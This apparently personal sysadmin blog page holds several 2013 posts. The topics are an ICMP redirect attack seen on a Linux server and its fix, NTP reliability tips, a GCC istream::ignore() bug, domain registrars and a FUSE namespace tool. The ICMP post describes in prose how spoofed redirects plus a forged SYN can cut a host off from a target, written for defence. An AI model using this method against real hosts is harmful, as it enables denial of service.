July 1, 2013
ICMP Redirect Attacks in the Wild
I recently lost an afternoon dealing with a most vexing routing problem on a server which turned out to be the result of an ICMP redirect attack.
ICMP redirects are a "feature" of IP which allows a router to inform a host that there's a more efficient route to a destination and that the host should adjust its routing table accordingly. This might be OK on a trusted LAN, but on the wild Internet, where malice abounds, it may not be such a good idea to alter your routing table at someone else's whim. Nevertheless, ICMP redirects are enabled by default on Linux.
The problem manifested itself with a customer unable to contact one of our servers. The customer provided a traceroute which starred out after the last hop before our server, leading him to conclude that our firewall was blocking him. We would probably have concluded the same thing, except we knew that no such firewall existed. From our end, traceroutes to him starred out immediately before even reaching our default gateway. Even more bizarrely, if we picked a certain one of our server's four IP addresses as the source address for the traceroute, the traceroute worked! Furthermore, we were able to traceroute to adjacent IP addresses on the customer's subnet from any source address without issue.
We looked again and again at our routing table and our iptables rules. There was nothing to explain this behavior. This server is virtualized, so we were starting to suspect the underlying host, when I decided to look at the kernel's route cache with the ip route show cache command. What I saw worried me greatly:
root@tommy:~# ip route show cache | grep 198.168.103.11
198.168.103.11 via 10.254.87.146 dev eth0 src 66.228.52.206
198.168.103.11 from 66.228.52.251 via 10.254.87.146 dev eth0
198.168.103.11 from 66.228.52.209 via 10.254.87.146 dev eth0
198.168.103.11 from 66.228.52.206 via 66.228.52.1 dev eth0
198.168.103.11 from 66.228.52.250 via 10.254.87.146 dev eth0
These entries say to route packets to 198.168.103.11 (the customer's IP address, changed to protect their identity) via 10.254.87.146. However, 10.254.87.146 is not our default gateway. In fact, we don't use any private IP addresses that look remotely like that. The fourth entry, which has a legitimate gateway and applies only to packets with a source address of 66.228.52.206, explains why we could successfully use that one IP address as a source address.
I had read about ICMP redirect attacks before and suspected that they may be at play here. To test this hypothesis I spun up a test server and used an extremely useful tool called scapy to send my own fake ICMP redirect packets. The results were strange. Sending the fake ICMP redirect did not immediately put a bogus entry in the route cache. However, if I attempted to contact the host targeted by the redirect within 10 minutes of sending the redirect, then an entry appeared in the route cache that prevented me from contacting the host. Furthermore, once the entry got in the cache, there was no getting rid of it. Even if I flushed the cache, the rogue entry came back the next time I tried to contact the targeted host. The kernel was clearly keeping some separate state of redirected route entries, and as far as I could tell, there was no way to inspect it. This meant that the only way to recover the affected server was to reboot it!
There are clear denial-of-service possibilities. If you want to prevent a host (the "victim") from contacting another host (the "target"), just send a fake redirect packet for the target to the victim! Since you don't need to forge a packet's source address to send a rogue ICMP redirect, it will make its way past RP filters. The only constraint is that your victim needs to contact the target within 10 minutes of receiving the redirect for it to stick. This is easy to overcome: you can send the redirect when the victim is likely to be contacting the target, or simply send a new redirect every 10 minutes (that's hardly high volume). Or, more diabolically, if you have the ability to spoof source addresses, you can follow the redirect packet with a TCP SYN packet with its source address spoofed as the target. The victim will reply to the target with a SYN-ACK, and in doing so make permanent the effect of the ICMP redirect.
Obviously you need to disable ICMP redirect packets on any public-facing host. Unfortunately, the most intuitive and
widely-documented way of disabling ICMP redirects on Linux (by writing 0 to /proc/sys/net/ipv4/conf/all/accept_redirects)
doesn't always work! From Documentation/networking/ip-sysctl.txt of the Linux source:
accept_redirects - BOOLEAN Accept ICMP redirect messages. accept_redirects for the interface will be enabled if: - both conf/{all,interface}/accept_redirects are TRUE in the case forwarding for the interface is enabled or - at least one of conf/{all,interface}/accept_redirects is TRUE in the case forwarding for the interface is disabled accept_redirects for the interface will be disabled otherwise default TRUE (host) FALSE (router)
This arcane logic means that for a non-router (i.e. most servers), not only must
/proc/sys/net/ipv4/conf/all/accept_redirects
be 0, but so must /proc/sys/net/ipv4/conf/interface/accept_redirects. So, to recap,
the following will reliably
disable ICMP redirects (assuming your interface is eth0):
echo 0 > /proc/sys/net/ipv4/conf/all/accept_redirects
echo 0 > /proc/sys/net/ipv4/conf/eth0/accept_redirects
If you put that in a system startup script, you should be safe.
A final note: the precise behavior for handling ICMP redirects and the route cache may differ between kernel versions. My tests were conducted on 2.6.39.
March 27, 2013
Running a Robust NTP Daemon
Accurate time is essential on a server, and running ntpd is the best way to ensure it. Unfortunately, ntpd, especially on Debian, can be finicky and in the past I've had trouble with clock drift and ntpd failing to start on boot. Here are my best practices to avoid the problems.
On Debian, make sure lockfile-progs is installed
On Debian (and likely Ubuntu too), there's a nasty race condition on boot between ntpdate and ntpd. When the network comes up, ifupdown runs ntpdate to synchronize the clock. But at about the same time, ntpd starts. If ntpdate is still running when ntpd starts, ntpd can't bind to the local NTP port and terminates. Sometimes ntpd starts on boot and sometimes it doesn't!
The Debian scripts avoid this using locks, but only
if the lockfile-progs package is installed.
This is a Recommends: for ntpdate, but if you don't install Recommends: by default, you may miss
this.
If you use DHCP, don't request ntp-servers
If your system gets its IP address from DHCP using dhclient, then by default dhclient will update your ntpd configuration with NTP server information it receives from the DHCP server. It is extremely frustrating to configure reliable upstream NTP servers only to have them replaced with unreliable servers (such as those that advertise phony leap seconds, as has happened to me multiple times). And the last thing you want is your configuration management system fighting with dhclient over what NTP servers to use.
To prevent this, edit /etc/dhcp/dhclient.conf and remove ntp-servers from the request line.
Don't use the undisciplined local clock (i.e. server 127.127.1.0)
Make sure these lines aren't in your ntp.conf:
server 127.127.1.0
fudge 127.127.1.0 stratum 10
These lines enable the Undisciplined Local Clock, and cause ntpd to start using your local clock as a time source if the real NTP servers aren't reachable. This can be useful if you want to keep a group of servers on a local network in sync even if your Internet connection goes down, but in general you don't need or want this. I've seen strange situations where the local clock becomes preferred over the real NTP servers, resulting in clock drift that goes uncorrected. Best to disable the local clock by removing all references to 127.127.1.0.
March 2, 2013
GCC's Implementation of basic_istream::ignore() is Broken
The implementation of std::basic_istream::ignore()
in GCC's C++ standard library suffers from a serious flaw.
After ignoring the n characters as requested, it checks to see
if end-of-file has been reached. If it has, then the stream's eofbit is set.
The problem is that to check for end-of-file, ignore()
has to essentially peek ahead in the stream one character beyond what
you've ignored. That means that if
you ask to ignore all the characters
currently available in the stream buffer, ignore() causes
an underflow of the buffer. If it's a file stream, the buffer can be
refilled by reading from the filesystem in a finite amount of time,
so this is merely inefficient. But if it's a socket, this underflow can be fatal:
your program may block forever waiting for bytes that never come. This is horribly
unintuitive and is inconsistent with the behavior of std::basic_istream::read(),
which does not check for end-of-file after reading the requested number of characters.
The origin of this problem is that the C++ standard is perhaps not as clear as it should be regarding
ignore(). From section 27.7.2.3:
basic_istream<charT,traits>& ignore(streamsize n = 1, int_type delim = traits::eof());Effects: Behaves as an unformatted input function (as described in 27.7.2.3, paragraph 1). After constructing a sentry object, extracts characters and discards them. Characters are extracted until any of the following occurs:
- if
n != numeric_limits<streamsize>::max()(18.3.2),ncharacters are extracted- end-of-file occurs on the input sequence (in which case the function calls
setstate(eofbit), which may throwios_base::failure(27.5.5.4));traits::eq_int_type(traits::to_int_type(c), delim)for the next available input characterc(in which casecis extracted).
Note that the Standard does not specify the order in which the checks should be performed, suggesting
that a conformant implementation may check for end-of-file before checking if n characters have been
extracted, as GCC does. You may think that the order is implicit in the ordering of the bullet points,
but if it were, then why would the Standard explicitly state the order in the case of getline()?
From section 27.7.2.3:
basic_istream<charT,traits>& getline(char_type* s, streamsize n, char_type delim);Effects: Behaves as an unformatted input function (as described in 27.7.2.3, paragraph 1). After constructing a sentry object, extracts characters and stores them into successive locations of an array whose first element is designated by
s. Characters are extracted and stored until one of the following occurs:
- end-of-file occurs on the input sequence (in which case the function calls
setstate(eofbit));traits::eq(c, delim)for the next available input characterc(in which case the input character is extracted but not stored);nis less than one orn - 1characters are stored (in which case the function callssetstate(failbit)).These conditions are tested in the order shown.
At least this is one GCC developer's justification
for GCC's behavior. However, I have a different take:
I believe that the only way to satisfy the Standard's requirements for ignore() is to perform the checks
in the order presented. The Standard says that "characters are extracted until any of the following occurs."
That means that when n characters have been extracted, ignore() needs to terminate, since this condition is
among "any of the following." But, if ignore() first checks for end-of-file and blocks forever, then it
doesn't terminate. This constrains the order in which a conformant implementation can check the conditions, and is
perhaps why the Standard does not need to specify an explicit order here, but does for getline() where it
really does want the end-of-file check to occur first.
I have left a comment on the GCC bug stating
my interpretation. One problem with fixing this bug is that it will break code that has come to depend on eofbit being
set if you ignore all the data remaining on a stream, though I'm frankly skeptical that much code would make
that assumption. Also, both LLVM's libcxx
and Microsoft Visual Studio (version 2005, at least) implement ignore() according to my interpretation
of the Standard.
In the meantime, be very, very careful with your use of ignore(). Only use it on
file streams or when you know you'll be ignoring fewer characters than are available to be read.
And don't rely on eofbit being set one way or the other.
If you need a more reliable version of ignore(), I've written a
non-member function implementation which takes a std::basic_istream
as its first argument. It is very nearly a drop-in replacement for the member function
(it even properly throws exceptions depending on the stream's exceptions mask), except that it returns
the number of bytes ignored (not a reference to the stream) in lieu of making the number of bytes
available by a call to gcount(). (It's not possible for a non-member function
to set the value returned by gcount().)
March 1, 2013
Why Do Hackers Love Namecheap and Hate Name.com?
Update: as of 2022, I no longer use or recommend name.com. My preferred registrars are, in order, Amazon Route 53, Gandi, and Google Domains.
Namecheap has brilliant marketing. The day that GoDaddy announced their support of SOPA, Namecheap pounced on the opportunity. They penned a passionate blog post and declared December 29, 2011 "Move Your Domain Day," complete with a patriotic theme, a coupon code "SOPAsucks," and donations to the EFF. Move Your Domain Day was such a success that it has its own Wikipedia article. Namecheap led the charge against GoDaddy, and I think it's safe to assume that most people who transferred from GoDaddy because of SOPA transferred to Namecheap. Now they seem to be the preferred registrar of the Hacker News/Reddit crowd.
Now consider Name.com. They too opposed SOPA and encouraged transfers using a "nodaddy" coupon code. But they didn't exert nearly as much effort as Namecheap and as a consequence probably lost out on a lot of potential transfers.
But Name.com has a bigger problem. They get raked over the coals on Hacker News because their free DNS hosting service adds a wildcard record that points their users' otherwise non-existent subdomains to their own ad-laden landing page. I think that's bad and they shouldn't do it. But at the same time, people should understand the distinction between domain registration and DNS hosting.
I'm very happy with Name.com as a domain registrar. It is the best I've
used (among Network Solutions, GoDaddy, Directnic, Gandi, and 1&1) and the
first that I haven't had any significant complaints about. I haven't
used Namecheap. Namecheap looks like a good registrar too, but Name.com appears
at least as good, if not better. Their UI is friendly and uncluttered. Their
about page makes them seem just as non-evil as Namecheap.
Name.com has long supported both IPv6 glue records and DNSSEC (Namecheap
recently added IPv6 glue but still has no DNSSEC support).
Name.com has two-factor authentication, which is pretty important for such a critical service.
When you buy a domain from Name.com, you're paying for the registration. You don't have to use their DNS service, especially when there are so many good options for DNS hosting: Amazon's Route 53 is very inexpensive, Cloudflare offers DNS as part of their free plan, Hurricane Electric has a free DNS service, Linode has free DNS for their customers, there are paid providers like ZoneEdit, SlickDNS, etc. Or you can host your own DNS.
As a general rule, registrars make crummy DNS providers. Usually the interface is clunky and they don't support all the record types. Only a few months after registering my first domain with Network Solutions, their entire DNS service suffered an hours-long outage during which my domain was unresolvable. Ever since, I've hosted my own DNS without a problem (recently I added Linode as my slave).
I don't have a dog in this race, but I think it would be a shame for someone to exclude a good registrar like Name.com from consideration just because they're a bad DNS provider. It would also be a shame for someone to use any registrar's crummy DNS service when there are so many better options out there.
February 9, 2013
Easily Running FUSE in an Isolated Mount Namespace
I've previously discussed how FUSE's nonstandard semantics can cause problems with rsync-based backups. In short, when stat() is called on a FUSE mount owned by another user, the kernel returns EACCES, even though POSIX says EACCES is for when a file's path can't be traversed. This is done to isolate the effects of an unstable or malicious FUSE filesystems to only the user who mounted it.
In my opinion, instead of stretching POSIX by returning EACCES, a better way to isolate FUSE mounts would be to make them invisible to other users. This has been discussed before, first in 2005 with a patch to add "private mounts" to Linux and later in 2006 with a proposal for stat() to return a fake stat structure for FUSE mounts. However, both times the proposals were rejected in favor of using the more general namespace support along with shared subtrees to achieve isolated FUSE mounts.
Unfortunately, while namespaces and shared subtrees are quite powerful, they have not seen widespread adoption, and userspace support for them is limited to some basic command primitives that don't do much on their own. While there is a PAM namespaces module, it's tailored to giving users isolated /tmp directories.
So, I wrote a very simple C program called with-fuse. with-fuse takes a command as its argument and executes that command with gid fuse and in an isolated mount namespace. Any mounts and unmounts performed inside the private namespace are invisible to the rest of the system. At the same time, mount and unmounts performed in the global namespace are immediately visible inside the private namespace. with-fuse can be safely installed setuid-root to give users on the system a means of using FUSE without affecting other users.
Example:
$ with-fuse /bin/sh
$ sshfs ...
$ exit
For with-fuse to work, the following command must be run at system boot (for example, from /etc/rc.local):
mount --make-rshared /Note that with-fuse creates a per-process namespace, not a per-user namespace. That means that the mounts created in one with-fuse namespace will not be visible in another with-fuse namespace, even if both namespaces are owned by the same user. Therefore, the user may wish to run a terminal multiplexer like GNU Screen inside his with-fuse namespace, in order to share the namespace among several shells:
$ with-fuse screen
To ensure that users only use FUSE from within a with-fuse namespace, /dev/fuse should be owned by group fuse and have 660 permissions. No user should be a member of group fuse, as with-fuse will take care of granting that GID.
You can download the source for with-fuse here. It's short and extensively commented if you'd like to learn how it works.